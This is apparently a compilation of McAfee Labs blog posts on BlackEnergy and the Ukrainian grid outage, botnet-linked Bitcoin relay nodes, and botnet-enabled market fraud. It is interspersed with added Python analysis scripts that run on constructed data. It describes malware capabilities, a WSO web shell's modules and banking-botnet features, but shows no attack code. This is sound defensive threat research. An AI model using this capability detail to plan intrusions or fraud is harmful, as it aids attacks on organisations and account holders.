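    return {hop: names for hop, names in seen.items() if len(names) > 1}


if __name__ == "__main__":
    shared = shared_relays({"march-2015": [MARCH_PHISH], "december-2015": [DECEMBER_PHISH]})
    for (host, ip), names in shared.items():
        print(f"{host} [{ip}] seen in: {', '.join(sorted(names))}")
```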

Besides these files, we also received a package of suspicious files for analysis. These files were part of a web template system called Synio. The Synio template is part of the LiveStreet Content Management System (CMS). LiveStreet is a Russian site that allows for the free download of engines for blogging and social networking. We do not know whether these files were related to the spear-phishing campaign or were part of lateral movement. However, we noticed references to the Synio template being used on the server that hosted the payload for the dropper: “8080/templates/compiled/synio/…” One of the files in the templates was definitely not part of normal content management.

After analysis of this PHP file, we determined that it was a PHP web shell.

These WSO web shells are often used after compromising a server to maintain access. They usually support multiple modules with a variety of features. In this case the shell included the following modules:

  • Console
  • SQL Manager
  • Support for Windows and Linux OS
  • Server information
  • File manager
  • Editing, modifying files
  • SQL console
  • PHP console
  • Network analysis tools

Access to the web shell was protected by a password stored as an MD5 hash, which was easy to crack.

One interesting feature was the “search for hash” option, with which discovered hashes could be sent to certain sites that might have already cracked the values behind them:

[Image: the web shell’s “search for hash” option]

For both the March and December attacks, there are some similarities:

  • Spear phishing using weaponized Office documents.
  • The email sender used a valid “info” address in Ukraine.
  • The same mail provider and server were used.
  • Common backdoor tools were used.
  • The sophistication of the attacks was low.

The use of BlackEnergy for espionage is not new, but prior to the December attack there had been no evidence that earlier campaigns used BlackEnergy for more than stealing confidential information from a victim organization. Although the latest attack included a wiper component, we did not find any evidence that this malware specifically targeted SCADA systems. Therefore, it appears unlikely that the BlackEnergy malware was the direct cause of the outage. It is unclear whether a single actor both controlled BlackEnergy and issued a coordinated shutdown of the electrical system.

Meanwhile, the spear-phishing campaigns in Ukraine appear to have continued into January 2016, using Word documents instead of Excel. Although our information does not yet point to a clear cause, additional details are emerging and our analysis is ongoing. We have greater confidence that the follow-up phishes came from the same group than that this group was responsible for the availability disruption. Not only does this attack show the same modus operandi, but it is also more aligned with the level of technical sophistication we have seen with BlackEnergy. We are continuing our analysis as we receive more samples and will provide more detail in due course.

The post A Case of Mistaken Identity? The Role of BlackEnergy in Ukrainian Power Grid Disruption appeared first on McAfee Blogs.

Updated BlackEnergy Trojan Grows More Powerful
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/updated-blackenergy-trojan-grows-more-powerful/
Thu, 14 Jan 2016 18:33:30 +0000
In late December, a cyberattack caused a power outage in the Ukraine, plunging hundreds of thousands of citizens into darkness for hours. Threat researchers soon confirmed that the BlackEnergy malware package, first developed in 2007, was the culprit. They also discovered that the malware has been significantly upgraded since its first release.

The initial BlackEnergy was a simple Trojan with distributed denial of service capabilities. Since then, there have been two upgrades.

BlackEnergy 2

In 2010, BlackEnergy 2 appeared. In that development cycle, the authors completely rewrote the code and began to incorporate a more professional approach. For example, they implemented a rudimentary installer that made it simpler to use BlackEnergy.

With the growth in BlackEnergy 2’s popularity, the authors decided to add features and give BlackEnergy a more modular framework. In 2011, they added UAC bypass installers. This method allowed BlackEnergy 2 to gain elevated code execution privileges using the framework Microsoft provides to help legacy applications work with newer versions of Windows. One of BlackEnergy 2’s most impressive features, support for 64-bit drivers, was released in 2013.

BlackEnergy 3

In the second quarter of 2014, F-Secure was the first to report a new variant of BlackEnergy. This variant no longer uses many of the features of BlackEnergy 2.

Each major release has seen an almost complete rewrite of the code. BlackEnergy 3 has more advanced features than its predecessors and is more cleanly developed. The new release does not have a driver, the build ID format is a timestamp, and it has many advanced protection mechanisms. These internal protections include defenses against virtual environments, antidebugging methods, and continued checks throughout the code that will kill the program if it detects other security functions or countermeasures. What stands out about BlackEnergy 3 is the variety of plug-ins it incorporates:

BlackEnergy 3 plug-ins*:

  • fs.dll — File system operations
  • si.dll — System information, “BlackEnergy Lite”
  • jn.dll — Parasitic infector
  • ki.dll — Keylogger
  • ps.dll — Password stealer
  • ss.dll — Screenshots
  • vs.dll — Network discovery, remote execution
  • tv.dll — Team viewer
  • rd.dll — Simple pseudo “remote desktop”
  • up.dll — Update malware
  • dc.dll — List Windows accounts
  • bs.dll — Query system hardware, BIOS, and Windows info
  • dstr.dll — Destroy system
  • scan.dll — Network scan

These plug-ins are critical and powerful features in BlackEnergy 3 that make it a “go-to” tool for both crimeware and state-sponsored actors.

The Ukrainian critical infrastructure attack was initially seen as politically driven. Indeed, the use of BlackEnergy 3 could well be a cover for a targeted manual attack in an effort to disrupt availability. However, at this point in the analysis, attributing the attack to a group or actor is premature.

Based on its functionality, BlackEnergy 3 could certainly be used by state-sponsored groups as it allows these actors to hide among other crimeware groups known to use BlackEnergy variants. Tradecraft is often shared and many actors like to impersonate other actors in efforts to hide their true affiliations and sponsorships.

This is in stark contrast to Stuxnet, which first captured headlines in 2010. Examination of the Stuxnet code by threat researchers revealed that the authors needed unique domain knowledge to execute it in a specific environment and that only state-sponsored groups likely had the insight and capability to create this malicious piece of code.

At the end of this post you will find all of the MD5 hashes associated with BlackEnergy in 2015. McAfee products provide full coverage for all hashes listed.

Several of the malicious binaries used in these attacks contain fake Microsoft digital certificates. The process of code signing is used to authenticate the software’s author and guarantee that the code has not been altered or corrupted since it was signed. Faking the code signing process reduces trust in this system and is indicative of a higher level of adversary involvement. Such techniques have been used by many actors and advanced-threat groups, but it is still too early to attribute this attack to any group or actor.

We would like to thank McAfee Advanced Programs Group for their support in the development of this analysis.

 

The MD5 hashes associated with BlackEnergy 3 in 2015 (binaries allegedly associated with the Ukraine attack, and other BlackEnergy binaries) and the BlackEnergy 3 IP addresses are listed in the original post.

The post Updated BlackEnergy Trojan Grows More Powerful appeared first on McAfee Blogs.

Blockchain Transactions Create Risks for Financial Services
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/blockchain-transactions-create-risks-financial-services/
Thu, 17 Dec 2015 00:36:35 +0000
This post was written by Raj Samani and Christiaan Beek of McAfee, and Shane D. Shook, PhD.

Trust is the most valuable commodity in the digital age. Failure to trust the systems or organizations in which we place our digital assets leads us to look at alternate providers, or to withdraw entirely from a suspect service. Within the financial services industry, the notion of trust is of paramount importance to institutions and account holders alike. Investors must be confident that the money they have in their accounts is available for use whenever they need it, and that the routes and terminals involved in buying Christmas presents, for example, are protected with many layers of security.

But what happens with this concept of trust if, for example, one in every 25 withdrawals made from an ATM is authorized by a bank operated by a known criminal organization? Or if one of every six credit card purchases was transacted by a terminal suspected to be controlled by known criminal organizations? It is likely the implied level of trust customers have in the financial system would be shaken; moreover, they would certainly seek a more trustworthy provider for financial transactions.

Looking at trust among cryptocurrencies, McAfee has undertaken an analysis of Bitcoin to determine the likely risk to transactions made with this increasingly popular method of payment. In particular, we focused on the risks to the security of the network that serves the “blockchain,” the public database of all Bitcoin transactions. Although our research did not identify any specific risks associated with the security of the funds exchanged, we did identify risks that may affect the reliability of the blockchain itself. Our focus was predominantly on Bitcoin relay nodes, and the integrity of those nodes.

Whenever these transaction relay nodes do not offer a sufficient level of integrity (for example, being a part of botnet operations), they could be used to manipulate Bitcoin transactions through route control, denial of service, or by modifying transaction protocols. Moreover, a botnet-controlled relay node can be monitored to reveal the identity of one party in a transaction. If enough relay nodes are connected by a botnet operator, it may even be possible to deanonymize the other parties. Further, as the blockchain and related products have evolved, vulnerabilities in software clients have cropped up. Attempts to exploit the Bitcoin peer-to-peer network are known in research as well as in the wild; thus the knowledge of botnet- or malware-associated peers is a concern.

Background
The blockchain is a public ledger that facilitates payment through cryptocurrencies (such as Bitcoin) for goods or services of more than 10,000 vendors and many thousands of individuals, including legitimate (food, airfare, books, cars) and illegitimate (malware, extortion/ransom, drugs). The blockchain is also being explored for commercial purposes with new offerings created for “secure exchange” services such as currencies, contracts, and equities trading or clearing.

The blockchain includes literal details concerning every transaction between addresses that have successfully negotiated a transfer, such as Bitcoin payments from one wallet to another, including time, sender and receiver wallet addresses, amounts, and relay IP addresses (both v4 and v6) of “bitnodes” that facilitate the transactions’ communications.

At any time there are around 9,000 active bitnodes, some that operate as “full nodes” (peers) and others that serve as relays or a type of proxy, also known as a “lightweight node.”

[Figure: active bitnodes]

Source: https://bitnodes.21.co/

Related Risks
According to data collected from Blockchain.info and Bitnodes.io (which peer with approximately 70% of active nodes), combined with open-source intelligence (OSINT) about botnets and malicious network addresses, nearly 145,000 unique IP addresses relayed blockchain transactions for Bitcoin between February and December 2015. Approximately 2% of those bitnodes were coincidentally included for use by malware samples, and another 1% appeared on Internet blacklists related to botnet control servers or other compromised hosts. Those figures are historical summaries; viewed in real time, they reflect more significant risks to the security of blockchain transactions.

For the same period, a real-time review of active bitnodes (available peers) showed that at any given time 4% of bitnode addresses were included for use by malware samples (available for review on VirusTotal.com), and an additional 13% of bitnodes appeared on public Internet blacklists. Thus, in effect, one in six Bitcoin transactions was relayed by nodes under the control of malicious operators. The difference between the historical and real-time statistics is simple: bitnodes that correspond with malware or botnets act as blockchain relays more often than others.

For example, let’s look at the following details of a bitnode active on December 2:

[Figure: details of the bitnode active on December 2]

The malware sample that used the preceding bitnode (IP address) was a Fujacks Trojan, a well-documented botnet backdoor that allows a botmaster to remotely control the infected computer, collect information, and install other malware or tools that suit the botmaster’s (or subscribers’) interests.


This bitnode has been active since November 24:

[Figure: activity of the bitnode since November 24]

The associated malware is the Sefnit Trojan, a botnet backdoor that not only allows the botmaster to remotely control the host but also, upon installation, injects a TOR client to mask botnet communications. Compromised computers could suffer the installation of any malicious tools. For example, past infections of Sefnit include ad-click fraud. There is also documented coincidental history of the use of Sefnit by malicious botmasters to mine bitcoins using infected computers. As with many botnets, takedown efforts are sometimes temporary, and the subsequent utility of the botnet changes and on occasion expands.

Our analysis of the varied malware samples that relate to bitnode addresses that have relayed blockchain transactions during the past 18 months demonstrates that most of the botnets are related to Zeus. Zeus source code has been readily available (in several publicly released iterations and sold in specific versions) since at least 2011. It is a popular “starter kit” for botnet creation, and anyone with relatively modest technical capabilities can build and operate a botnet. More important, though, botnets offer subscriber services that can facilitate more exotic crimes than simply compromising access to a computer.

The preceding Sefnit malware sample used that bitnode (IP) address as a TOR relay address, so not only Bitcoin transactions were relayed through that bitnode; other TOR users could also use that host. Unfortunately, those users were not all legitimate: computers infected with that Sefnit malware were inducted into a botnet that used that TOR relay (coincidentally the bitnode address).

OSINT and McAfee threat intelligence confirmed that 3% of the unique bitnode addresses observed between February and December 2015 were included in malware samples for botnet communications, as control or routing addresses. Of those addresses, the following 30 bitnodes accounted for 25% of associated malware submissions.

[Figure: the 30 bitnode addresses with the most associated malware submissions]

Our analysis of submitted malware samples that used those bitnode addresses indicated that 83% of related samples were from the following malware families:

 

Malware in Top 30 Bitnode Addresses (Feb–Dec 2015), with number of submissions:

  • Allaple: 4,611
  • Kelihos: 860
  • Bladabindi: 378
  • Pykspa: 106
  • Bulta: 71
  • Fynloski: 71
  • Zbot: 65
  • Dynamer: 61
  • Sality: 57
  • Virut: 53
  • Carberp: 52
  • Renos: 42
  • Dugenpal: 41
  • Bagsu: 35
  • Glupteba: 32
  • Swrort: 28
  • Waledac: 25
  • Skeeyah: 25
  • Omaneat: 24
  • Runpoor: 18
  • Dacic: 11
  • Senta: 8
  • Sisron: 6
  • Vitro: 5
  • Teerac: 5
  • Peaac: 4
  • Bumat: 3
  • Reveton: 1
  • Simda: 1

Where are they?
This begs the question: which came first? Was the bitnode (host) set up by a botmaster for nefarious purposes, or was a host compromised and misused for botnet control? As far as blockchain uses go, does it matter? The result is the same: the host is under botnet control.

Many people mistakenly assume that blockchain transactions are always protected by the use of TOR; however, our analysis of the IP addresses regarding TOR nodes indicates that less than 0.25% of known bitnodes are also TOR nodes. TOR is commonly recommended for use with blockchain software clients, so the coincidence of bitnodes that also serve as TOR nodes is an additional risk to be considered by vendors or subscribers to blockchain technology.

The following map shows the geographic layout of TOR nodes on December 2.

[Map: TOR nodes on December 2]

Source: http://cdetr.io/tor-node-map/

Bitnodes are deployed globally according to concentrations of users who support the technology. Consequently, the nodes that coincidentally are used for other purposes (such as TOR or malware control) are equally global in their geolocations. There is general overlap in geographic regions between TOR and bitnodes, although the overlap in addresses is very limited.

[Map: global distribution of bitnodes]

Source: https://bitnodes.21.co/

Applying OSINT to the blockchain
By using OSINT and proprietary information we can create dispositions of bitnodes by their risk categories. The following map indicates the regional concentrations (on December 2) by bitnodes as (red) Suspicious, (blue) Interesting, and (yellow) Normal. “Suspicious” indicates a bitnode that appears on blacklists and has high detection rates in samples that use the bitnode address. “Interesting” is a bitnode address that is a known TOR exit node or appears in any malware samples. “Normal” encompasses all others.

[Map: bitnode dispositions on December 2]

Only a relatively small percentage of nodes (17%) are Suspicious or Interesting. The following chart shows the breakout of Suspicious nodes by country code.

[Chart: Suspicious nodes by country code]

Other host providers include cloud services and public or free Internet hosts. Such services are sought out and used extensively by botmasters as they often allow limited free use, or full subscription use for a defined period (commonly one to three months before they are abandoned or terminated). Indeed, between February and December, 20% of all unique bitnodes we analyzed existed for no more than one day, 72% for less than one month, 99% for less than three months, and less than 1% existed for more than three months.

More on TOR
The coincidence of the TOR network and bitnodes may be greater than OSINT demonstrates. For example, in December 2014 “LizardSquad” hacked the TOR network, taking control of 30% to 40% of active nodes. One effect of the attacks was an increase in new bitnodes.

The following graph illustrates a 4% increase in Normal nodes and a 1% increase in Suspicious nodes, with a 4% decrease in Interesting nodes that occurred on December 26, 2014, when the TOR attacks began.

[Graph: changes in Normal, Suspicious and Interesting nodes on December 26, 2014]

This data could be interpreted to mean that the additional nodes were botnet nodes previously masked by TOR. The new Interesting and Suspicious nodes were the product of antimalware submissions and blacklist updates reported by researchers. By December 30, 2014, the TOR network had recovered, and the number of visible bitnodes decreased as they were again masked; in the interim, however, the aggregate had increased to an estimated 23% of all bitnodes related to botnets.

In effect, the December 2014 attacks by LizardSquad (and subsequent research performed by security organizations around the world) revealed previously unknown nodes on the Bitcoin network, some associated with malware or botnets. This demonstrates the extent (about 6%) of TOR nodes that provided anonymity to blockchain transactions—at least in that period.

What this means for financial risk
Bitcoin has an estimated market cap of $5.4 billion. On December 2, 2015, a total of $634 million (depending on the exchange venue) in transactions value was routed through the global bitnodes. Although only the noted 17% of bitnodes are indicated to be “known associates” of malware or botnets, those nodes accounted for 31% of the volume of (unconfirmed) transactions relayed that day. In other words, almost $200 million of Bitcoin transactions were relayed through suspect nodes.

What does this mean? The funds themselves are not at risk of theft by a relaying node: the blockchain protects each transaction through distributed (and autonomous) processing and validation, so a relay cannot redirect or spend what it forwards. There are, however, availability concerns that go beyond simple outages, for example the possibility of "value" impediments when the route is manipulated in the peer map of related clients. (The exchange value of Bitcoin is related in part to the volume available for trading and to the availability of peers to process the transactions.) Outages may be brief, but they have immediate consequences, because whether a client discovers "good" or "bad" peers depends fundamentally on the availability of good nodes.

Beyond interruptions, there is the risk of malicious entities gaining insights into transactions. Botmasters can simply monitor the peers that they control to understand the origin and valuable details of the transactions in their exchange form. Although they will not see into traded contracts, or be able to steal from cryptocurrency exchanges, they can monitor who is trading with whom and how often—and potentially control when/if and where their traffic is able to route.

The health of any network is crucial to the integrity of the service it supports. Financial products and services related to the blockchain may be affected by botnet- or malware-associated nodes that relay transactions, currently or in the future, as the sophistication of attacks and exploits continues.

A final note
Much more specific details of risks are available when the blockchain (ledger) and bitnodes are tied to threat intelligence. On December 2 two ransomware payment addresses for Virlock were used in 14 transactions. Five of the 14 transactions were relayed by bitnodes associated with malware or botnets. Although blacklisting Bitcoin addresses can be a difficult proposition (as many addresses have been stolen from legitimate users’ wallets over time and misused in much the same way that stolen credit card numbers are used sporadically by cybercriminals), some insights of specific addresses are useful to understanding the risk of transactions made with otherwise “anonymous” counterparties.
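
The three measurements used in this post (the share of relayed value that passed through Suspicious or Interesting nodes, threat-intel payment addresses matched against the relay records, and the node-lifetime distribution from the hosting discussion) come down to joining a few tables. The script below works those joins as an added Python example; it is not McAfee's code. Every record in it is constructed: the node IPs are documentation ranges, the Bitcoin addresses are placeholders, the "Virlock" tag stands in for the real payment addresses (which the post does not list), and the Normal/Suspicious/Interesting labels are taken as given rather than derived.

```python
"""Joining bitnode relay telemetry with node classifications and a threat-intel
address list, and bucketing node lifetimes.

Added example, not McAfee's code. All data below is constructed.
"""
from collections import defaultdict
from datetime import date

SUSPECT_CLASSES = {"Suspicious", "Interesting"}

# Constructed node classification (ip -> class), as assigned by the research.
NODE_CLASS = {
    "192.0.2.10": "Normal",
    "192.0.2.11": "Normal",
    "192.0.2.12": "Normal",
    "198.51.100.7": "Suspicious",
    "203.0.113.5": "Interesting",
}

# Constructed relay observations: (relaying node, txid, value in BTC, output addresses).
# One record per observation: the same unconfirmed tx seen from two nodes counts
# twice, which matches the "volume relayed" measure used above.
RELAY_LOG = [
    ("192.0.2.10", "tx01", 12.5, ["1ExampleShopAAAA"]),
    ("192.0.2.11", "tx02", 3.0, ["1ExampleUserBBBB"]),
    ("198.51.100.7", "tx03", 0.9, ["1ExampleRansomPayCCCC", "1ExampleUserBBBB"]),
    ("203.0.113.5", "tx04", 40.0, ["1ExampleExchangeDDDD"]),
    ("192.0.2.12", "tx05", 1.1, ["1ExampleRansomPayCCCC"]),
    ("198.51.100.7", "tx06", 2.5, ["1ExampleShopAAAA"]),
]

# Constructed threat-intel list (address -> tag); placeholder address, not a real one.
THREAT_INTEL = {"1ExampleRansomPayCCCC": "Virlock ransomware payment address"}

# Constructed first/last sighting per node, for the lifetime distribution.
SIGHTINGS = {
    "192.0.2.10": (date(2015, 2, 1), date(2015, 2, 1)),
    "192.0.2.11": (date(2015, 3, 4), date(2015, 3, 5)),
    "192.0.2.12": (date(2015, 5, 1), date(2015, 5, 13)),
    "198.51.100.7": (date(2015, 6, 1), date(2015, 7, 16)),
    "203.0.113.5": (date(2015, 8, 1), date(2015, 11, 9)),
}


def is_suspect(ip, node_class=NODE_CLASS):
    return node_class.get(ip) in SUSPECT_CLASSES


def node_share(node_class=NODE_CLASS):
    """Fraction of classified nodes that are Suspicious or Interesting."""
    return sum(1 for c in node_class.values() if c in SUSPECT_CLASSES) / len(node_class)


def value_share(relay_log=RELAY_LOG, node_class=NODE_CLASS):
    """Fraction of relayed value that passed through suspect nodes."""
    total = sum(v for _, _, v, _ in relay_log)
    suspect = sum(v for ip, _, v, _ in relay_log if is_suspect(ip, node_class))
    return suspect / total if total else 0.0


def flag_transactions(relay_log=RELAY_LOG, node_class=NODE_CLASS, intel=THREAT_INTEL):
    """Relay observations whose outputs touch a threat-intel address."""
    flagged = []
    for ip, txid, value, outputs in relay_log:
        hits = sorted({intel[a] for a in outputs if a in intel})
        if hits:
            flagged.append({"txid": txid, "node": ip, "value": value,
                            "tags": hits, "via_suspect": is_suspect(ip, node_class)})
    return flagged


def summarize_by_tag(flagged):
    """Per tag: (relay observations, how many of them came through suspect nodes)."""
    summary = defaultdict(lambda: [0, 0])
    for f in flagged:
        for tag in f["tags"]:
            summary[tag][0] += 1
            summary[tag][1] += f["via_suspect"]
    return {tag: tuple(counts) for tag, counts in summary.items()}


def lifetime_shares(sightings=SIGHTINGS):
    """Cumulative share of nodes seen for <=1 day, <1 month, <3 months, and >=3 months."""
    days = [(last - first).days for first, last in sightings.values()]
    n = len(days)
    return {
        "<=1 day": sum(d <= 1 for d in days) / n,
        "<1 month": sum(d < 30 for d in days) / n,
        "<3 months": sum(d < 90 for d in days) / n,
        ">=3 months": sum(d >= 90 for d in days) / n,
    }


if __name__ == "__main__":
    print(f"suspect nodes: {node_share():.0%}, value via suspect nodes: {value_share():.0%}")
    for f in flag_transactions():
        print(f)
    print(summarize_by_tag(flag_transactions()))
    print(lifetime_shares())
```

The point the numbers make is visible even in this toy set: two of five nodes are suspect, yet they carry most of the relayed value, and one of the two ransomware-tagged relays went through a suspect node. A real feed would replace the constructed dictionaries with the bitnode crawl, the relay capture and the blacklist export.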

We might conclude from this research that Bitcoin is a payment platform that cannot be trusted, but that is not the case. We do depend on trustworthy payment platforms, and understanding the associated risks allows us to build appropriate controls that mitigate those risks to tolerable levels. Bitcoin, like any other payment platform (electronic or physical), has risks, and some of them are specific to a decentralized virtual currency. Our intention is to highlight those risks so that measures can be introduced to reduce them to a level acceptable to all of us operating within this digital society.

The post Blockchain Transactions Create Risks for Financial Services appeared first on McAfee Blogs.

A Dummies Guide to ‘Insider Trading’ via Botnet, Part 2
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/a-dummies-guide-to-insider-trading-via-botnet-part-2/
Mon, 23 Nov 2015 20:00:07 +0000

The post A Dummies Guide to ‘Insider Trading’ via Botnet, Part 2 appeared first on McAfee Blogs.

This post, the second of two parts, was written by Christiaan Beek, Raj Samani, and Shane Shook. 

In our first post, we examined the evolution of the botnet. In this follow-up we will discuss a new botnet operating model that allows an attacker to get an insider’s view of infected organizations without actually being an insider—all while remaining undetected and manipulating data for financial gain.

Fiction or reality?

Many examples of attacks by botnet malware resulting in financial theft or accounts fraud have been published that trace the evolution of “personal” information stealers into “corporate” information stealers. In 2009 Patco Construction, in Sanford, Maine, was robbed of $588,000. In that same year, US law enforcement arrested individuals associated with the incursions via botnets into 390 companies in the United States, with estimated related losses at more than $70 million. Similar activities occurred in 2012 when Tennessee Electric Co. lost almost $328,000 after their bank account was taken over by cyber thieves.

Other examples abound, but the evolution of the use of botnets continues as more and more corporate services are facilitated online. In 2014 Salesforce.com users were targeted by malware configured to automatically steal login details, and even bypass two-factor authentication. Numerous examples of malware configurations to target corporate financial, securities, and other web services are available through cursory Internet searches. Dyre samples include more than 450 URLs intended to be automatically monitored for credentials theft, including corporate and personal web services. Some of the configured URLs include nonspecific wildcards to harvest credentials used for popular corporate financial and HR applications.

In May, the Australian Federal Police released a report concerning corporate securities trading fraud in which malware actors were targeting nontraditional financial platforms in Australia. Investigations into large sums of money fraudulently transferred from various Australian financial institutions using corporate accounts commenced in February 2014.

The investigations showed that two brokerage services were making unusual transactions. Forensic investigations revealed the presence of “financial” malware. The malware, in this instance, was defined as malicious software that has been designed to steal, alter, and compromise financial transactions and credentials.

Some results from the investigation:

  • Logins occurring in excess of a month prior to the first fraudulent transaction.
  • Logins occurring while the broker was listed as absent from work.
  • Logins occurring between specific periods consistent with known Eastern European actors.
  • Logins using specific user-agent strings consistent with known Eastern European actors.
  • Numerous forged authorizations had been processed without question. 
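
The findings above are the kind of indicators an investigator can turn into a screening pass over the brokerage's own login records. The script below does that as an added Python example; it is not the Australian Federal Police's or McAfee's code. Its log lines, absence calendar, baseline IP, first-fraud date, actor-hours window and user-agent watchlist are all constructed for the illustration: the post names no specific hours or user-agent strings, so the ones used here are assumptions standing in for whatever the investigation actually correlated.

```python
"""Screening broker-portal logins for the indicators listed above.

Added example, not the AFP's or McAfee's code. All data and thresholds below
are constructed; the actor-hours window and user-agent pattern are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import date, datetime, time

# Constructed login log: "<iso timestamp> <user> <source ip> <user agent>"
SAMPLE_LOG = """\
2014-01-07T09:12:41+00:00 jsmith 203.0.113.24 Mozilla/5.0 (Windows NT 6.1; WOW64) Trident/7.0
2014-01-14T02:47:03+00:00 jsmith 198.51.100.9 Mozilla/5.0 (Windows NT 5.1; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
2014-02-03T03:15:22+00:00 jsmith 198.51.100.9 Mozilla/5.0 (Windows NT 5.1; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
2014-02-10T10:05:00+00:00 jsmith 203.0.113.24 Mozilla/5.0 (Windows NT 6.1; WOW64) Trident/7.0
"""

# Constructed context an investigator would pull from HR, network records and the fraud timeline.
ABSENCES = {"jsmith": [(date(2014, 2, 1), date(2014, 2, 5))]}   # recorded leave
FIRST_FRAUD = {"jsmith": date(2014, 2, 20)}                     # first fraudulent transaction
BASELINE_IPS = {"jsmith": {"203.0.113.24"}}                     # the broker's usual source address
ACTOR_HOURS = (time(0, 0), time(5, 0))                          # assumed UTC window tied to the actors
ACTOR_UA_PATTERNS = [re.compile(r"Firefox/3\.6\.\d+")]          # assumed watchlist entry

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")


@dataclass
class LoginEvent:
    ts: datetime
    user: str
    ip: str
    user_agent: str


def parse_log(text):
    """Parse the space-separated log format above; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            events.append(LoginEvent(datetime.fromisoformat(m.group(1)),
                                     m.group(2), m.group(3), m.group(4)))
    return events


def assess(event):
    """Return the indicators a single login matches (empty list = nothing unusual)."""
    reasons = []
    d = event.ts.date()
    if any(start <= d <= end for start, end in ABSENCES.get(event.user, [])):
        reasons.append("login while user recorded absent")
    if ACTOR_HOURS[0] <= event.ts.time() < ACTOR_HOURS[1]:
        reasons.append("login inside actor-hours window")
    if any(p.search(event.user_agent) for p in ACTOR_UA_PATTERNS):
        reasons.append("user-agent on watchlist")
    if event.ip not in BASELINE_IPS.get(event.user, set()):
        reasons.append("source ip not in user baseline")
    return reasons


def flagged_logins(events):
    """(timestamp, user, reasons) for every login that matched at least one indicator."""
    return [(e.ts.isoformat(), e.user, assess(e)) for e in events if assess(e)]


def lead_time_days(events, user):
    """Days from the earliest flagged login to the first fraudulent transaction, or None."""
    flagged = [e for e in events if e.user == user and assess(e)]
    if not flagged:
        return None
    return (FIRST_FRAUD[user] - min(e.ts.date() for e in flagged)).days


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    for row in flagged_logins(evts):
        print(row)
    print("days of access before first fraud:", lead_time_days(evts, "jsmith"))
```

The lead-time figure is the one that matters for scoping: it tells the investigator how far back the account review has to go, and in the constructed data the first flagged login precedes the fraud by more than a month, as the AFP findings describe.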

Market information stealer: This tool helps a subscriber gain insight into valuable, sensitive and highly protected information. It is less focused on credential theft, although that remains an important feature for subscribers who want to discern the financial performance of their victims. Instead the malware facilitates managed access to specific information stores or screens from which time-sensitive information can be surreptitiously observed or copied.

[Diagram: a botmaster controlling computers in two banks and a trading firm, and selling that access to a subscriber]

In the preceding picture, the botmaster has control over computers in two banks and a trading firm, representing capital markets analysts and a corporate controller. The botmaster is simply providing access to a subscriber (“Malicious Trader”), who can see sensitive information in each company, a kind of “Botnet-Flix.” With that access, the Malicious Trader can use the information to anticipate the financial market and start actions that will give him, or the organization he’s working for, a financial gain.

The crimes committed are not only the intrusion into the bank and trading firm computers, but also the exploitation of the proprietary and sensitive information for gain.

Although this seems an incredible situation, such facilities are provided by a long history of botnet malware that enable automated or manual access to infected computers.

Examples of malware features

The following table, from the SecureWorks report linked below, shows the banking botnets active as of March 2015 and the plug-ins and functions available to operators or subscribers (Y = built in, N = absent, Plug-in = available as an add-on module):

Banking Botnets and Extra Features

Family      Man in the Browser  Redirect  VNC/Back Connect  Screenshots  Video Capture  Proxy    Certificate Stealer
Zeus        Y                   Y         Y                 Y            Plug-in        Y        Y
IceIX       Y                   Y         Y                 Y            Plug-in        Y        Y
Citadel     Y                   Y         Y                 Y            Plug-in        Y        Y
Gameover    Y                   Y         Y                 Y            N              Y        Y
KINS        Y                   Y         Y                 Y            Plug-in        Y        Y
Shylock     Y                   N         Y                 N            Y              Y        Y
Geodo       Y                   Y         Y                 Y            N              N        Y
Dridex      Y                   Y         Y                 Y            N              Y        Y
Gozi        Y                   N         Y                 Y            N              Y        Y
Dyre        Y                   Y         Plug-in           Y            Y              Y        Y
Ramnit      Y                   Y         Y                 Y            N              N        N
Tinba       Y                   Y         Y                 Y            N              Y        N
Hesperbot   Y                   Y         Plug-in           Plug-in      Plug-in        Plug-in  Plug-in

Source: http://www.secureworks.com/assets/pdf-store/other/banking-botnets-persist-2015.pdf

The Zeus malware’s video capture plug-in can detect if a remote desktop session is being launched and start recording that session. Examples of malware and their features can be viewed on YouTube:

  • VNC and session recording (see 5:38): https://www.youtube.com/watch?v=FBaW6M1Edtk
  • Zeus 2015, full panel configuration on services: https://www.youtube.com/watch?v=UcHnrvS2-S8

Fraud is a crime conducted by individuals. Malware is a tool that can be useful to those individuals. Botnets connect interested individuals with tools they can use, and ready access to victims on whom the fraud can be committed.

A recent example concerning market information theft that began in 2010 and continued for five years involved hackers and traders who stole sensitive information that allowed trading resulting in an estimated $100 million in profits. The access to the stolen information was facilitated by botnets, and hackers disseminated instructions and tutorials, created by rogue traders, along with stolen information. A Ukrainian trading company, Jaspen Capital Partners, was identified by the SEC as a beneficiary of the stolen information used to trade on the nonpublic information.

In a settlement press announcement, the SEC stated that the company:

“…made approximately $25 million buying and selling contracts-for-differences (CFDs) on the basis of hacked press releases stolen from two newswire services between 2010 and 2014 and made additional profits trading on press releases stolen from a third newswire service in 2015. CFDs are derivatives that allow traders to place highly leveraged bets on the direction of a stock’s price movement. Without admitting or denying the SEC’s allegations, Jaspen and Supranonok agreed to be enjoined from violating the antifraud provisions of U.S. securities laws and related SEC antifraud rules and to return $30 million of allegedly ill-gotten gains.”

Whether the intended fraud is personal or corporate financial theft, or market manipulation by trading on information that no one else has the opportunity to know, the crime is based on the motive, means, and opportunity.

What’s next?

We write this article to raise awareness, not as a scare tactic. Our analysis of these and similar events is based on our customers submitting malware samples that connect to botnets known for selling their services to subscribers.

Infections by malware of this sort need further investigation, focusing on which endpoint was infected, the user's role and rights, whether someone was watching over the victim's shoulder, and what insider data could have been used.

Prevention

  • Keep your endpoint detection up to date.
  • In addition to promptly patching operating systems, keep all third-party software up to date, especially Adobe Flash.
  • Learn the capabilities of these malware families.

Contributors

We would like to thank the many people involved in this research, including members of the Malware Operations team, the Malware Sample Database team, the Foundstone Incident Response team, and our special coauthor of this research, Dr. Shane Shook.

